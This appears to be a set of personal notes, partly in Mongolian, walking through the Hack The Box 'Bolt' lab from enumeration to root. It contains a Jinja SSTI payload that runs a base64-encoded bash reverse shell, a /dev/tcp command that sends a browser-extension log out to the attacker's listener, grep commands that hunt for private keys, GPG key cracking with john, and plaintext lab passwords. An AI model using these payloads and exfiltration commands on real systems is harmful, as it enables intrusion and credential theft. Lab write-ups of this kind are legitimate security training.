1. IP Address
# Machine Address
10.10.11.114
# Local Address
10.10.14.50
2. Nmap
# Nmap 7.91 scan initiated Thu Nov 4 00:16:52 2021 as: nmap -sC -sV -oA nmap/bolt 10.10.11.114
Nmap scan report for 10.10.11.114
Host is up (0.51s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)
| 256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)
|_ 256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Starter Website - About
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-title: Passbolt | Open source password manager for teams
|_Requested resource was /auth/login?redirect=%2F
| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2021-02-24T19:11:23
|_Not valid after: 2022-02-24T19:11:23
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 4 00:17:28 2021 -- 1 IP address (1 host up) scanned in 36.27 seconds
3. Gobuster
gobuster dir -u http://10.10.11.114 -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -o gobuster.out
/login (Status: 200) [Size: 9287]
/index (Status: 308) [Size: 247] [--> http://10.10.11.114/]
/register (Status: 200) [Size: 11038]
/contact (Status: 200) [Size: 26293]
/download (Status: 200) [Size: 18570]
/profile (Status: 500) [Size: 290]
/logout (Status: 302) [Size: 209] [--> http://10.10.11.114/]
/services (Status: 200) [Size: 22443]
/pricing (Status: 200) [Size: 31731]
/sign-in (Status: 200) [Size: 9287]
/sign-up (Status: 200) [Size: 11038]
хэрэг болох зүйл олдсонгүй.
Gobuster with VHOST
gobuster vhost dir -u http://10.10.11.114 -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -o gobuster_vhost.out
Vhost -р хайж үзвэл илэрц олдсонгүй:
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.114
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/13 08:14:13 Starting gobuster in VHOST enumeration mode
===============================================================
===============================================================
2021/11/13 09:04:24 Finished
===============================================================
4. ffuf
ffuf -u 10.10.10.250/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
Output:
________________________________________________
:: Method : GET
:: URL : http://10.10.11.114/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
:: Output file : fuff.out
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
login [Status: 200, Size: 9287, Words: 2135, Lines: 173]
register [Status: 200, Size: 11038, Words: 3053, Lines: 199]
contact [Status: 200, Size: 26293, Words: 10060, Lines: 468]
download [Status: 200, Size: 18570, Words: 5374, Lines: 346]
logout [Status: 302, Size: 209, Words: 22, Lines: 4]
services [Status: 200, Size: 22443, Words: 7170, Lines: 405]
pricing [Status: 200, Size: 31731, Words: 11055, Lines: 549]
sign-in [Status: 200, Size: 9287, Words: 2135, Lines: 173]
sign-up [Status: 200, Size: 11038, Words: 3053, Lines: 199]
check-email [Status: 200, Size: 7331, Words: 1224, Lines: 147]
:: Progress: [43003/43003] :: Job [1/1] :: 162 req/sec :: Duration: [0:04:31] :: Errors: 0 ::
check-email хаяг байна. Орохоор:
http://10.10.11.114/check-email
Burp:
POST /register HTTP/1.1
Host: 10.10.11.114
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
Origin: http://10.10.11.114
DNT: 1
Connection: close
Referer: http://10.10.11.114/register
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
username=ca4mi&email=ca4mi%40mail.com&password=ca4mi
GET /auth/login?redirect=%2F HTTP/2
Host: 10.10.11.114
Cookie: passbolt_session=32q4d8uhp91s8j1nq7p79qprp7; csrfToken=55812a799be2316e0d4af2e41bc4793889c05b6e178787be229a78a9320d5bb317d53e6d70ce9ddca41ee337b5650ce8d36926445447873d30dc06d62adcecb7
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Cache-Control: max-age=0
Te: trailers
Connection: close
5. Image tar
tar -xvf image.tar
tar: This does not look like a tar archive
tar: Exiting with failure status due to previous errors
адлаа загаад, дахин татаж үзсэн. Болсон
sql
Hash password энэ дотроос олоод crack хийх хэрэгтэй. Crack хийхэд хугацаа орон гэж бодоод (хэдийн) encrypt хийсэн нууц үг ашиглав.
admin:deadbolt
Eddie demo.bolt.htb/register mail.bolt.htb
Invite code:
41093412e0da959c80875bb0db640c1302d5bcdffec759a3a5670950272789ad/app/base/routes.py
invite_code
XNSS-HSJW-3NGU-8XTJ
SSTI
demo - гоор ороод user үүсгэнэ. Үүсгэсэн user-н нэрийг settings хэсгээс:
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zNi85MDAxIDA+JjEK | base64 -d | bash")["read"]() %} a {% endwith %}
болгож өөрчлөөд nc асаан mail.bolt.htb нэвтэрч орон баталгаажуулах мэйлийг дараад shell-р орно.
/etc/passbolt/passbolt.php
/var/mail/eddie
eddie@bolt:~$ cat /var/mail/eddie
From clark@bolt.htb Thu Feb 25 14:20:19 2021
Return-Path: <clark@bolt.htb>
X-Original-To: eddie@bolt.htb
Delivered-To: eddie@bolt.htb
Received: by bolt.htb (Postfix, from userid 1001)
id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)
Subject: Important!
To: <eddie@bolt.htb>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20210225212019.DFF264CD@bolt.htb>
Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)
From: Clark Griswold <clark@bolt.htb>
Hey Eddie,
The password management server is up and running. Go ahead and download the extension to your browser and get logged in. Be sure to back up your private key because I CANNOT recover it. Your private key is the only way to recover your account.
Once you're set up you can start importing your passwords. Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...
-Clark
eddie’s password: rT2;jW7<eY8!dX8}pQ8%
user.txt
528abe*******
eddie ssh:
grep -iR "BEGIN PGP"
grep -iR "PRIVATE KEY"
john is required
etc/hosts
passbolt.bolt.htb
- /home/eddie/.gnupg/openpgp-revocs.d/eddie.key
- .config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log
003.log файл локал машин руу хуулах: local
nc -lvnp 9001 > 0003.log
machine
cat /home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log > /dev/tcp/10.10.14.50/9001
Хуулсан log-г vim-р орон filter ашиглахад хэрэглэх value:
:%s/\\\\r\\\\n/\r/g
rockyou value:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=gpg private_key.txt
eddie-с:
su root
Passwrod:
(2rmxsNW(Z?3=p/9s